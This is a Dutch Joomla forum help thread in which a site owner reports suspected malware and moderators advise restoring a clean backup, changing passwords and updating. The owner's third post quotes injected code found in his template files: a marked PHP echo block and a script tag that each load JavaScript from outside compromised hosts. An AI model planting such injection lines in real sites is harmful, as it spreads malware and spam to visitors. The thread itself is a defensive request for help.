Skip to main content

Welkom bij Joomla!NL

Om alle mogelijkheden van dit forum te kunnen gebruiken, moet je je eerst registreren.

Malware javascript

Malware javascript

23 mei 2014 16:54 - 23 mei 2014 16:59
#1
Beste allemaal,

In de broncode van de header van mijn site staat volgend javascript:
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-nl" lang="nl-nl" dir="ltr" > <head> <script type="text/javascript">var NREUMQ=NREUMQ||[];NREUMQ.push(["mark","firstbyte",new Date().getTime()]);</script>

In de footer staat iets gelijkaardigs nl.
Code:
div><!-- end footer --> </div> </div> <script type="text/javascript">if(!NREUMQ.f){NREUMQ.f=function(){NREUMQ.push(["load",new Date().getTime()]);var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://js-agent.newrelic.com/nr-100.js";document.body.appendChild(e);if(NREUMQ.a)NREUMQ.a();};NREUMQ.a=window.onload;window.onload=NREUMQ.f;};NREUMQ.push(["nrf2","beacon-1.newrelic.com","b598e3cdaa",832621,"YFRUY0RQWEFVUkJcDlkeY0VfHl9cUFROGxFfQQ==",0,533,new Date().getTime()]);</script> </body> </html>


Is iemand hiermede bekend en waar of op welke manier kan ik dit verwijderen?
Om de zoveel dagen begint dit script reclame of links te spuien naar andere websites.

Dank bij voorbaat,
Michel

Edit Peter: Ik heb de code tussen codetags geplaatst, volgende keer graag zelf doen.
Laatst bewerkt 23 mei 2014 16:59 door Peter. Reden: code tussen code tags
  • Cockm
  • Cockm's berichtenfoto Heeft onderwerp gestart
  • Nieuw op Joomla!NL
  • Nieuw op Joomla!NL
  • Berichten: 15

Malware javascript

23 mei 2014 17:17
#2
ff gezocht op google. Script is van "new relic" en wordt gebruikt om de performance te monitoren. Niet zeker of daar ook de advertenties van komen...
Heb je onlangs wat geïnstalleerd?
Met vriendelijke groet,

Peter Reitsma
Wil je Joomla!NL steunen? Dat kan met een donatie.

  • Peter
  • Peter's Profielfoto
  • Algemeen Moderator
  • Algemeen Moderator
  • Berichten: 2826

Malware javascript

23 mei 2014 22:01
#3
Dag Peter,

Hartelijk dank voor je repliek.
Wat je beschrijft, had ik ook reeds gegoogeld, maar blijft wel vreemd daar ikzelf zoiets nooit heb gebruikt.
Zelf heb ik dit nog niets nieuw geïnstalleerd op de site doch in alle index.php van de templates was er script toegevoegd in de aard van:
<
Code:
#d0f313# if(empty($ie)) { $ie = "<script type=\"text/javascript\" src=\"http://www.zenasubaruteam.it/forumITA/counter.php?id=16195053\"></script>"; echo $ie; } #/d0f313#


ofwel:
Code:
<li><a href="#main" class="u2">Doorgaan naar inhoud<script type="text/javascript" src="http://www.devodip.de/css/counter.php?id=16195055"></script></a></li>

Het lijkt mij zelfs dat er templates zijn toegevoegd zoals bv BEEZ_20_old waarvan ik zeker weet dat ik nooit zo'n template heb geïnstalleerd. (In mijn origineel staat het in ieder geval niet)

In de errorlog op de server merk ik wel dat een maand geleden iemand 3à4 uren op een stuk heeft trachten in te loggen.
Doch ondertussen had ik het paswoord veranderd.

Pfff ... ik heb echt geen idee.
  • Cockm
  • Cockm's berichtenfoto Heeft onderwerp gestart
  • Nieuw op Joomla!NL
  • Nieuw op Joomla!NL
  • Berichten: 15

Malware javascript

23 mei 2014 22:32
#4
Hallo,

Meestal wordt een site gehackt doordat er Malware of Spyware op je lokale pc zit.
Ga dus als volgt te werk:
  1. Zorg ervoor dat je PC Spy- en Malware vrij is.
  2. Zet een goede recente backup terug.
  3. wijzig al je wachtwoorden.
  4. update je site naar de nieuwste versie van Joomla en vergeet ook niet alle extensies mee te nemen.
  5. Maak meteen een nieuwe backup.
Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst.
Vragen uitsluitend via dit forum.
yndi.nl - kvk 17157725 		Is je vraag beantwoord? Dan kan je het draadje zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

  • Astrid
  • Astrid's Profielfoto
  • Moderator + Technisch team
  • Moderator + Technisch team
  • Berichten: 37094

Malware javascript

23 mei 2014 22:47
#5
Dag Astrid,

Mijn pc wordt wekelijks gescand op alles en nog wat.
Zou dus moeten veilig zijn.

Paswoord heb ik nu veranderd en ik zal zo snel mogelijk een update uitvoeren.
  • Cockm
  • Cockm's berichtenfoto Heeft onderwerp gestart
  • Nieuw op Joomla!NL
  • Nieuw op Joomla!NL
  • Berichten: 15

Malware javascript

23 mei 2014 22:51
#6
Een update helpt niet voor een site die al besmet is. Dus zet eerst een schone backup terug.
Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst.
Vragen uitsluitend via dit forum.
yndi.nl - kvk 17157725 		Is je vraag beantwoord? Dan kan je het draadje zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

  • Astrid
  • Astrid's Profielfoto
  • Moderator + Technisch team
  • Moderator + Technisch team
  • Berichten: 37094

Malware javascript

23 mei 2014 23:43
#7
Sorry Astrid,

Ik bedoelde het wel goed maar heb niet alles getypt.
Eerst schone backup en dan update.

Dank voor het advies

Hoe kan ik dit onderwerp afsluiten?
  • Cockm
  • Cockm's berichtenfoto Heeft onderwerp gestart
  • Nieuw op Joomla!NL
  • Nieuw op Joomla!NL
  • Berichten: 15

Malware javascript

24 mei 2014 09:06 - 24 mei 2014 09:09
#8
Bij deze sluit ik je topic wel af.
Met vriendelijke groet,
Wouter Compactweb.nl
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum.
Wil je Joomla!NL steunen? Dat kan met een donatie.

Laatst bewerkt 24 mei 2014 09:09 door Astrid.
  • WoodyF4u
  • WoodyF4u's Profielfoto
  • Moderator + Nieuwsteam
  • Moderator + Nieuwsteam
  • Berichten: 11165
Moderators: Juliank92JellePeterRomke
Tijd voor maken pagina: 1.505 seconden

Wil je Joomla!NL steunen?

Steun Joomla!NLAlle teamleden werken enthousiast, op vrijwillige basis, mee aan Joomla!NL. Maar een website met forum kost nu eenmaal geld. Dus als je Joomla!NL wilt steunen, dan kan dat, graag zelfs!

Lees hier meer informatie